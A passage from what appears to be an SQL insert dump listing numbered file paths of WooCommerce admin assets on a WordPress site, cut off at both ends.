locks/index.js'),(6791,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-email/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-email/block.json'),(6792,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-email/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-email/edit.js'),(6793,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-email/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-email/index.js'),(6794,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-email/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-email/types.js'),(6795,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-quantity/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-quantity/block.json'),(6796,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-quantity/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-quantity/edit.js'),(6797,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-quantity/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-quantity/index.js'),(6798,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-quantity/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-quantity/types.js'),(6799,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-sku/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-sku/block.json'),(6800,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-sku/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-sku/edit.js'),(6801,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-sku/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/inventory-sku/index.js'),(6802,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/name/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/name/block.json'),(6803,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/name/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/name/edit.js'),(6804,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/name/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/name/index.js'),(6805,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/name/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/name/types.js'),(6806,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/notice/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/notice/block.json'),(6807,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/notice/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/notice/edit.js'),(6808,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/notice/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/notice/index.js'),(6809,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/password/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/password/block.json'),(6810,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/password/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/password/edit.js'),(6811,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/password/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/password/index.js'),(6812,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/password/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/password/types.js'),(6813,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/pricing/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/pricing/block.json'),(6814,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/pricing/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/pricing/edit.js'),(6815,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/pricing/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/pricing/index.js'),(6816,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/pricing/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/pricing/types.js'),(6817,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/radio/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/radio/block.json'),(6818,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/radio/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/radio/edit.js'),(6819,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/radio/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/radio/index.js'),(6820,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/radio/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/radio/types.js'),(6821,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/regular-price/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/regular-price/block.json'),(6822,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/regular-price/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/regular-price/edit.js'),(6823,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/regular-price/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/regular-price/index.js'),(6824,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/regular-price/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/regular-price/types.js'),(6825,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/sale-price/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/sale-price/block.json'),(6826,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/sale-price/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/sale-price/edit.js'),(6827,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/sale-price/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/sale-price/index.js'),(6828,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/sale-price/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/sale-price/types.js'),(6829,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/schedule-sale/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/schedule-sale/block.json'),(6830,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/schedule-sale/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/schedule-sale/edit.js'),(6831,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/schedule-sale/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/schedule-sale/index.js'),(6832,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/schedule-sale/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/schedule-sale/types.js'),(6833,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/section/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/section/block.json'),(6834,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/section/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/section/edit.js'),(6835,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/section/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/section/index.js'),(6836,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/section/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/section/types.js'),(6837,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-class/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-class/block.json'),(6838,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-class/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-class/edit.js'),(6839,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-class/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-class/index.js'),(6840,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-class/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-class/types.js'),(6841,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-dimensions/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-dimensions/block.json'),(6842,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-dimensions/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-dimensions/edit.js'),(6843,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-dimensions/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-dimensions/index.js'),(6844,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-dimensions/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/shipping-dimensions/types.js'),(6845,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/block.json'),(6846,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/constants.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/constants.js'),(6847,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/edit.js'),(6848,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/index.js'),(6849,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/paragraph-rtl-control/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/paragraph-rtl-control/index.js'),(6850,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/paragraph-rtl-control/paragraph-rtl-control.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/paragraph-rtl-control/paragraph-rtl-control.js'),(6851,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/paragraph-rtl-control/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/paragraph-rtl-control/types.js'),(6852,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/summary/types.js'),(6853,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tab/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tab/block.json'),(6854,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tab/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tab/edit.js'),(6855,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tab/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tab/index.js'),(6856,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tab/tab-button.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tab/tab-button.js'),(6857,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tag/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tag/block.json'),(6858,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tag/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tag/edit.js'),(6859,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tag/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/tag/index.js'),(6860,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/block.json'),(6861,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/create-taxonomy-modal.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/create-taxonomy-modal.js'),(6862,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/edit.js'),(6863,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/index.js'),(6864,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/types.js'),(6865,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/use-taxonomy-search.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/taxonomy/use-taxonomy-search.js'),(6866,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/toggle/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/toggle/block.json'),(6867,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/toggle/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/toggle/edit.js'),(6868,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/toggle/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/toggle/index.js'),(6869,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/toggle/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/toggle/types.js'),(6870,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/block.json'),(6871,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/edit.js'),(6872,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/index.js'),(6873,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/types.js'),(6874,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/variable-product-tour.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/variable-product-tour.js'),(6875,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/block.json'),(6876,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/edit.js'),(6877,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/index.js'),(6878,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/types.js'),(6879,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/block.json','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/block.json'),(6880,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/edit.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/edit.js'),(6881,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/empty-variations-image.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/empty-variations-image.js'),(6882,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/index.js'),(6883,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/types.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/types.js'),(6884,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.asset.php'),(6885,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.js','wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.js'),(6886,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.js.LICENSE.txt'),(6887,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/style-rtl.css'),(6888,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/style.css','wp-content/plugins/woocommerce/assets/client/admin/product-editor/style.css'),(6889,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-page/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/product-page/style-rtl.css'),(6890,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/profile-wizard/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/profile-wizard/style-rtl.css'),(6891,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/shipping-recommendations/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/shipping-recommendations/style-rtl.css'),(6892,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/store-alerts/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/store-alerts/style-rtl.css'),(6893,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/store-performance/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/store-performance/style-rtl.css'),(6894,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/tracks/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/tracks/index.asset.php'),(6895,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/tracks/index.js','wp-content/plugins/woocommerce/assets/client/admin/tracks/index.js'),(6896,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/undefined/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/undefined/style-rtl.css'),(6897,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wcpay-payment-welcome-page/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/wcpay-payment-welcome-page/style-rtl.css'),(6898,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/add-term-tracking.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/add-term-tracking.asset.php'),(6899,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/add-term-tracking.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/add-term-tracking.js'),(6900,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/attributes-tracking.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/attributes-tracking.asset.php'),(6901,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/attributes-tracking.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/attributes-tracking.js'),(6902,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/beta-features-tracking-modal.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/beta-features-tracking-modal.asset.php'),(6903,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/beta-features-tracking-modal.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/beta-features-tracking-modal.js'),(6904,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/category-tracking.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/category-tracking.asset.php'),(6905,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/category-tracking.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/category-tracking.js'),(6906,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/marketing-coupons.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/marketing-coupons.asset.php'),(6907,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/marketing-coupons.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/marketing-coupons.js'),(6908,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/marketing-coupons.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/marketing-coupons.js.LICENSE.txt'),(6909,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/navigation-opt-out.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/navigation-opt-out.asset.php'),(6910,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/navigation-opt-out.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/navigation-opt-out.js'),(6911,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-homepage-notice.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-homepage-notice.asset.php'),(6912,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-homepage-notice.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-homepage-notice.js'),(6913,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-load-sample-products-notice.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-load-sample-products-notice.asset.php'),(6914,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-load-sample-products-notice.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-load-sample-products-notice.js'),(6915,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-import-notice.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-import-notice.asset.php'),(6916,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-import-notice.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-import-notice.js'),(6917,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-notice.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-notice.asset.php'),(6918,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-notice.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-notice.js'),(6919,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-tax-notice.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-tax-notice.asset.php'),(6920,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-tax-notice.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-tax-notice.js'),(6921,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/order-tracking.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/order-tracking.asset.php'),(6922,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/order-tracking.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/order-tracking.js'),(6923,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/payment-method-promotions.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/payment-method-promotions.asset.php'),(6924,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/payment-method-promotions.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/payment-method-promotions.js'),(6925,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/payment-method-promotions.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/payment-method-promotions.js.LICENSE.txt'),(6926,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/print-shipping-label-banner.asset.php','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/print-shipping-label-banner.asset.php'),(6927,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/print-shipping-label-banner.js','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/print-shipping-label-banner.js'),(6928,'/home/tummmyov/t